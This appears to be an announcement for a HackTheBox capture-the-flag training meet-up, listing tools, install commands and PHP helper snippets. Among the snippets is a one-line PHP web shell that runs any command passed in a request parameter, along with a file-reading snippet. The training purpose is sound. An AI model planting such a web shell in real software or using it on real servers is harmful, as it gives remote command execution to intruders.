In today's meet-up we'll be looking at a Capture-the-Flag machine from HackTheBox. We'll work through the same methodology that a penetration tester would use when approaching a target. Once finished, we will have root on the target machine as well as well-organized notes detailing our process that would form the basis of a report for the client.
Those participating are expected to have Kali Linux or Parrot Linux installed as they have the tools we will be using today. On this particular machine there is actually a path for Windows users to follow and the required tools are linked below. However, due to time constraints we won't be able to provide much support if issues arise for those on Windows.
A word of caution: although you can connect to HackTheBox from Windows directly, it is strongly recommended to connect via a VM. The target environment is shared between many users, so there is the potential for other users to be able to connect back to your computer.
A HackTheBox account is also required and should be set up before we begin. It is not a simple sign-up as you actually have to "hack" the website invitation system before you get a link, so give yourself a little time. You do not need a paid account for this livestream.
You are also expected to have some familiarity with the command line, as the tools we are using do not have GUIs.
Linux
- Firefox or Chrome - preinstalled on Kali/Parrot
- Gobuster - preinstalled or available on Kali/Parrot
- Weevely (optional, but highly recommended) - preinstalled on Kali
- SSH - preinstalled in most Linux distros
- Ghidra (optional, but highly recommended) - download 300MB - will require Java
If Gobuster is not installed, install it through apt:
sudo apt update
sudo apt install gobuster
If you do not have the JDK installed and will be using Ghidra, install the JDK as well (just over 200MB):
sudo apt update
sudo apt install default-jdk
Windows
- Firefox or Chrome
- 7-zip for .tar and .gz - 64-bit download
- PuTTY and PuTTYgen - 64-bit PuTTY - 64-bit PuTTYgen
- Gobuster - 64-bit download
- Ghidra (optional, but highly recommended) - download 300MB - will require Java
You should also have an SSH key generated for PuTTY and the RSA public key ready to use. Instructions here. Do not use a passphrase for the meet-up.
If you do not have the JDK installed, you can follow these instructions. However, I believe you'll most likely be using the 64-bit OpenJDK 11/Hotspot. Note: I did not test this personally.
If you're not able to, or prefer not to, use Weevely, then you will need some or all of the following code snippets.
Display "Hello"
<?php echo 'Hello'; ?>
Run a shell command and display the results
<?php system($_REQUEST['c']); ?>
Access via http://target/script.php?c=command
Display PHP info
<?php phpinfo(); ?>
Display file contents
<?php readfile('/path/to/file.txt'); ?>
Run a MySQL database query
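<?php
// Connect to the database (replace the placeholder connection details)
$conn = new mysqli('hostname', 'username', 'password', 'database');
// Run the query and print each result row
$result = $conn->query('SELECT 1234');
while ($row = $result->fetch_assoc()) {
    print_r($row);
}
$conn->close();
?>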